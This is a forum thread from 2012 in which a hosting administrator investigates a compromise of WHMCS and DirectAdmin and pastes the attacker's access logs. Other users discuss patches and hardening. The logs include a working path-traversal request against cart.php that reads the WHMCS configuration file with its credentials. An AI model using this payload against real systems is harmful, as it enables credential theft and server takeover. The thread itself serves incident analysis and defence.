Serious Direct Admin Security Concerns + UDP Attack Script Installed

pucky · Jan 23, 2012

The past 24hrs has been interesting and im convinced now that Directadmin has some serious security flaw that allows a person to gain access to the Directadmin account.

It started at around this time last night. I was watching my log file using tail when suddently i noticed an ip address loading up phpmyadmin and browsing all the databases on the server using my phpmyadmin username.

What was interesting is, he executed a transveral attack command and viewed my WHMCS configuration.php file to get access to my username and password, my bad, i didnt patch the cart.php vuln in WHMCS and thats how he got that info.

I knocked him offline, change my admin password to a 15 character password and banned his ip subnet, Israel, not that it mattered. All my dbs seem to be fine but only time will tell. Im not going to pick thought every db and table to see what he changed, if anything. I think he was mainly interested in passwords and i know that WHMCS passwords are all encrypted. Who knows about the others. I also applied the patch and went off to bed.

Today, im logged into SSH and get kicked off about 20 times. Very unusal. Just as i was starting to get annoyed i get a system message stating that my /var partition is 97% full.

HUH! How can that be possible? Upon investigating i find a 17gig error file in /var/log/httpd/domains/* that is way too large. When i look at it i find a script called errorlog.php installed in one of my wordpress sites under the admin account.

The script was a UDP attack script. People were loading it up all day and attacking other hosts/websites. Everytime it got too much for the system, i got booted from SSH.

When i login to admin and review the stats for 2 domains under my admin account i find that this Mfer logged into my admin account on 2 occassions. Both logins are recorded including his ip address. Now it was easy for him to use file manager to drop that script into my cgi-bin which btw was actually a .php file.

The million dollar question now is the method of password retrieval.

If a user violate your db using phpmyadmin there is no possible way for him to get my admin password. My admin password was not the same password as my phpmyadmin login. He didn not execute a command to retrieve the password file. I dont see that he did and even so, mod security would have caught him and there is no way to get the admin password from any of the dbs.

So how was he able to grab a 12 character, very difficult to remember password and use it to violate my admin account? Maybe this would be a question for DA. I find that unless there are other security issues with DA this was not possible.

He didnt sit there all day trying to guess the login and all my logins are via SSL btw. There are no keyloggers installed. How was the done? I cant see how he gained admin status, a mystery that has been written about before but unresolved.

Thanks

SeLLeRoNe · Jan 23, 2012

My guess is that changed the md5 value of whmcs admin password and from whmcs (dunno if is possible im just thinking) he changed directadmin admin password.

I should be totally wrong of course, but, this is my guess.

DA doenst save his passwords in MySQL but in passwd files (os level) so i dont see relation between phpmyadmin and ssh password at all, but i should be someway wrong.

Maybe someone else will reply with other ideas.

Regards

pucky · Jan 23, 2012

Well i dont see thats possible. Here is why. I was using the same WHMCS password to login. It worked then i changed the password.
When i logged into admin i used my old password and then i changed the password. If he would have changed it i would not have been able to login to both locations.

Also, he didnt get my SSH password, just my directamdin login to admin password.

SeLLeRoNe · Jan 23, 2012

I see your point, as i said my was just suggestions.. but.. unless you disable it, user admin in directadmin actually have ssh access too

Regards

Arieh · Jan 23, 2012

With the first exploit of the cart.php, did he had the chance to get access to DA/FTP/SSH? If so, he could then have modified whmcs files or could have uploaded other shell scripts.

edit: But anyway since he had access to admin, your whole system isn't safe anymore. Who knows what he did where.

Also does whmcs still requires register globals to be enabled? It looks like thats the cause of this exploit.

pucky · Jan 23, 2012

Admin user it not allowed to SSH to the box so he couldnt get in there. He didnt try it according to my logs. He went straight to admin though.

That exploit was unknown to me until i visited the WHMCS forum. There are about 3 patches i added. Register globals is off. Still, i have no idea how he got my admin pw by logging into phpmyadmin. This is the big mystery unless there is an exploit with logging into DA that we are unware of.

SeLLeRoNe · Jan 23, 2012

I dont know how whmcs work, but, are you sure that da passwords in the db are crypted?

Regards

Arieh · Jan 23, 2012

Since he first exploited whmcs it makes sense that it began there. If he could've logged into admin by a DA exploit he would've done that right away.

And I'm no whmcs user as well, but if admin details are stored in whmcs then that's probably where he got in. The password may be encrypted, but since whmcs needs to decrypt it to control the DA api it makes sense that the hacker could decrypt it too.

SeLLeRoNe · Jan 23, 2012

Thats exactly what i was thinking about.

Since DA need a "plain" password or WHMCS have a decrypt key (that hacker should have found) or is totally not encrypted (that is also plausible) and thats where the hacker found the key.

Check the DB where da admin password is stored and check how it looks, probably, is not md5.

Regards

zEitEr · Jan 23, 2012

Password for a server is encrypted in DB, but there might be a possibility to decrypt it. You might want to read this http://forum.whmcs.com/archive/index.php/t-1291.html

I'd rather suggest studying of apache logs, then scanning all files in homedir for any modification, and web shells.

If the hacker browsed phpmyadmin, you can track him with apache logs.

ditto · Jan 23, 2012

I am a WHMCS user. If the hacker got access to your WHMCS, then he would have access to ALL your servers listed in WHMCS, and he could have logged in as admin in DirectAdmin from WHMCS panel. The security hole in WHMCS is also discussed in several threads at Webhostingtalk, here is two of the largest threads:

http://www.webhostingtalk.com/showthread.php?t=1105350
and
http://www.webhostingtalk.com/showthread.php?t=1105806

Edit: Here is the thread of the latest pathc: http://www.webhostingtalk.com/showthread.php?t=1103716

zEitEr · Jan 23, 2012

pucky said:
Well i dont see thats possible. Here is why. I was using the same WHMCS password to login. It worked then i changed the password.

What would stop a hacker from putting the old hash of a password back as soon as het got access onto your directadmin powered server?

zEitEr · Jan 23, 2012

@ditto,

I have not read the threads (I might need to read them), but is it possible to change a location of admin to anything else, for example

from http://whmcs/admin/ to http://whmcs/admin8797jhsdl/ ? Would it work?

Or, maybe set IP based limits in .htaccess and chattr it immutable.

ditto said:
I am a WHMCS user. If the hacker got access to your WHMCS, then he would have access to ALL your servers listed in WHMCS, and he could have logged in as admin in DirectAdmin from WHMCS panel. The security hole in WHMCS is also discussed in several threads at Webhostingtalk, here is two of the largest threads

ditto · Jan 23, 2012

Yes, you can change the path to the admin folder to any path you like http://docs.whmcs.com/Further_Security_Steps

But the security issue is bigger then this, if WHMCS is not patched, they send you a support ticket to WHMCS system with som php code in the subject of the ticket (its related to smarty template system), and I think the hacker then would have access to read the content of WHMCS configuration.php file and other says that they would also get a lot more then that. You are basically losing control of all servers connected to WHMCS. And also configuration.php file contain the path to your http://whmcs/adminpath - the security issue is still actively being exploited, every week I get support tickets with the nasty code in subject.

zEitEr · Jan 23, 2012

ditto said:
if WHMCS is not patched

Doesn't 5.0.3 include the patch?

ditto · Jan 23, 2012

I don't know because I am still running WHMCS 4.5.2, but I would be very supriced if the latest 5.0.3 did not contain the patch. However here is a user posting 01-15-2012 saying that the latest WHMCS version did not contain the patch http://www.webhostingtalk.com/showpost.php?p=7903711&postcount=9 -but I can't beleive that is true. He must have misunderstood something.

Edit: The latest WHMCS 5.0.3 does contain the patch: http://forum.whmcs.com/showthread.php?t=43462

* All client area downloads have been updated to include this by default

zEitEr · Jan 23, 2012

@ditto,

ditto said:
Edit: The latest WHMCS 5.0.3 does contain the patch: http://forum.whmcs.com/showthread.php?t=43462

Thank you for your clarification.

pucky · Jan 23, 2012

managed to find his tracks from my logs files; Iv change the domain name to mydomain otherwise its left untouched.

The 1st two lines are rather interesting. Youll see where you viewed my whmcs config file further down.

46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /cart.php?a=test&templatefile=../../../configuration.php%00 HTTP/1.1" 200 7928 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"

Its right there which i missed the first time, tblservers <----

Since the server communicates with my server directly and it has to have the admin username and password to do it, thats how he got the admin info. SCARY!

Code:

46.116.94.55 - - [22/Jan/2012:01:47:18 -0800] "GET /cart.php HTTP/1.1" 302 5 "http://www.google.co.il/url?sa=t&rct=j&q=inurl:%22cart.php%22+directadmin&source=web&cd=210&ved=0CGoQFjAJOMgB&url=http%3A%2F%2Fwww.mydomain.com%2Fcart.php&ei=_tobT4OSIZD48QPmotSpCw&usg=AFQjCNFWj-Jp342yQWZUd9WM_XgYaXxhAQ" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:31 -0800] "GET /cart.php HTTP/1.1" 200 39199 "http://www.google.co.il/url?sa=t&rct=j&q=inurl:%22cart.php%22+directadmin&source=web&cd=210&ved=0CGoQFjAJOMgB&url=http%3A%2F%2Fwww.mydomain.com%2Fcart.php&ei=_tobT4OSIZD48QPmotSpCw&usg=AFQjCNFWj-Jp342yQWZUd9WM_XgYaXxhAQ" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/scheme_news-slider.css HTTP/1.1" 200 2418 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/extras/coda-slider/coda-slider.css HTTP/1.1" 200 2088 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/extras/ddmenu/ddmenu.css HTTP/1.1" 200 597 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/scheme_comparison.css HTTP/1.1" 200 4282 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/scheme_common.css HTTP/1.1" 200 9410 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/scheme_order.css HTTP/1.1" 200 9333 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/schemes/mydomain/stylesheet.css HTTP/1.1" 200 4820 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:32 -0800] "GET /templates/milestone/languages/english/language.css HTTP/1.1" 200 1182 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:33 -0800] "GET /templates/milestone/scheme_milestone.css HTTP/1.1" 200 16930 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:33 -0800] "GET /templates/milestone/extras/ddmenu/ddmenu.js HTTP/1.1" 200 12858 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:33 -0800] "GET /templates/milestone/images/yes.gif HTTP/1.1" 200 1024 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:33 -0800] "GET /templates/milestone/images/no.gif HTTP/1.1" 200 1006 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:35 -0800] "GET /includes/jscript/jquery.js HTTP/1.1" 200 57254 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:35 -0800] "GET /templates/milestone/extras/coda-slider/jquery.easing.js HTTP/1.1" 200 8097 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:35 -0800] "GET /templates/milestone/extras/coda-slider/jquery.coda-slider.js HTTP/1.1" 200 9834 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:35 -0800] "GET /templates/milestone/extras/ddmenu/ddmenucontents.js HTTP/1.1" 200 824 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:36 -0800] "GET /templates/milestone/schemes/mydomain/header_bg.gif HTTP/1.1" 200 1572 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /templates/milestone/schemes/mydomain/header_domain.gif HTTP/1.1" 200 252 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /templates/milestone/images/btn_go.png HTTP/1.1" 200 409 "https://mydomain.com/templates/milestone/scheme_milestone.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /cart.php?a=test&templatefile=../../../configuration.php%00 HTTP/1.1" 200 7928 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /templates/milestone/schemes/mydomain/banner_default.jpg HTTP/1.1" 200 17111 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:37 -0800] "GET /templates/milestone/schemes/mydomain/logo.jpg HTTP/1.1" 200 15320 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/images/products_980px.jpg HTTP/1.1" 200 21638 "https://mydomain.com/cart.php" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/images/comparison_tbl_head.gif HTTP/1.1" 200 2823 "https://mydomain.com/templates/milestone/scheme_comparison.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/images/comparison_tbl_head_right.gif HTTP/1.1" 200 1075 "https://mydomain.com/templates/milestone/scheme_comparison.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/images/comparison_tbl_body_680px.gif HTTP/1.1" 200 132 "https://mydomain.com/templates/milestone/scheme_comparison.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/schemes/mydomain/sidemenu_default.gif HTTP/1.1" 200 2532 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/schemes/mydomain/sidemenu_separate.gif HTTP/1.1" 200 83 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:38 -0800] "GET /templates/milestone/schemes/mydomain/sidemenu_bg.gif HTTP/1.1" 200 1850 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/fonts/candarab.ttf HTTP/1.1" 200 226564 "https://mydomain.com/templates/milestone/scheme_milestone.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/schemes/mydomain/sidemenu_bullet.png HTTP/1.1" 200 1058 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/schemes/mydomain/btn_small.gif HTTP/1.1" 200 699 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/schemes/mydomain/header_separate.gif HTTP/1.1" 200 450 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/schemes/mydomain/worldmap.gif HTTP/1.1" 200 8921 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/languages/english/flag.gif HTTP/1.1" 200 1006 "https://mydomain.com/cart.php?a=test&templatefile=../../../configuration.php%00" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:47:46 -0800] "GET /templates/milestone/schemes/mydomain/footer_bg.gif HTTP/1.1" 200 902 "https://mydomain.com/templates/milestone/schemes/mydomain/stylesheet.css" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:05 -0800] "GET /phpmyadmin HTTP/1.1" 301 324 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:06 -0800] "GET /phpmyadmin/ HTTP/1.1" 401 1107 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:19 -0800] "GET /phpmyadmin/ HTTP/1.1" 200 2606 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:20 -0800] "GET /phpmyadmin/js/update-location.js?ts=1324498073 HTTP/1.1" 200 758 "https://mydomain.com/phpmyadmin/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:21 -0800] "GET /phpmyadmin/js/common.js?ts=1324498073 HTTP/1.1" 200 5294 "https://mydomain.com/phpmyadmin/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:21 -0800] "GET /phpmyadmin/favicon.ico HTTP/1.1" 200 18902 "-" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:22 -0800] "GET /phpmyadmin/js/jquery/jquery-1.4.4.js?ts=1324498073 HTTP/1.1" 200 78268 "https://mydomain.com/phpmyadmin/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:23 -0800] "GET /phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e HTTP/1.1" 200 6477 "https://mydomain.com/phpmyadmin/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:23 -0800] "GET /phpmyadmin/phpmyadmin.css.php?token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=left&nocache=5301103624 HTTP/1.1" 200 5881 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:24 -0800] "GET /phpmyadmin/js/navigation.js HTTP/1.1" 200 2521 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/js/functions.js HTTP/1.1" 200 31563 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/logo_left.png HTTP/1.1" 200 4970 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_home.png HTTP/1.1" 200 806 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_loggoff.png HTTP/1.1" 200 688 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_selboard.png HTTP/1.1" 200 698 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_docs.png HTTP/1.1" 200 786 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e HTTP/1.1" 200 30715 "https://mydomain.com/phpmyadmin/" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_sqlhelp.png HTTP/1.1" 200 579 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_reload.png HTTP/1.1" 200 608 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:25 -0800] "GET /phpmyadmin/js/config.js?ts=1324498073 HTTP/1.1" 200 9480 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:26 -0800] "GET /phpmyadmin/phpmyadmin.css.php?server=1&token=615a7de98fa1a9cddc19ce84bee62e8e&js_frame=right&nocache=5301103624 HTTP/1.1" 200 41756 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:26 -0800] "GET /phpmyadmin/print.css HTTP/1.1" 200 1064 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:26 -0800] "GET /phpmyadmin/js/jquery/jquery.qtip-1.0.0.min.js?ts=1324498073 HTTP/1.1" 200 38434 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/js/functions.js?ts=1324498073 HTTP/1.1" 200 31563 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_import.png HTTP/1.1" 200 629 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_vars.png HTTP/1.1" 200 603 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_asci.png HTTP/1.1" 200 209 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_engine.png HTTP/1.1" 200 468 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/s_sync.png HTTP/1.1" 200 551 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_tblops.png HTTP/1.1" 200 610 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/themes/pmahomme/img/b_help.png HTTP/1.1" 200 1594 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - - [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/js/jquery/jquery-1.4.4.js HTTP/1.1" 200 78268 "https://mydomain.com/phpmyadmin/navigation.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
46.116.94.55 - efast_auzzi [22/Jan/2012:01:48:27 -0800] "GET /phpmyadmin/js/messages.php?lang=en&db=&token=615a7de98fa1a9cddc19ce84bee62e8e HTTP/1.1" 200 4954 "https://mydomain.com/phpmyadmin/main.php?token=615a7de98fa1a9cddc19ce84bee62e8e" "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1"
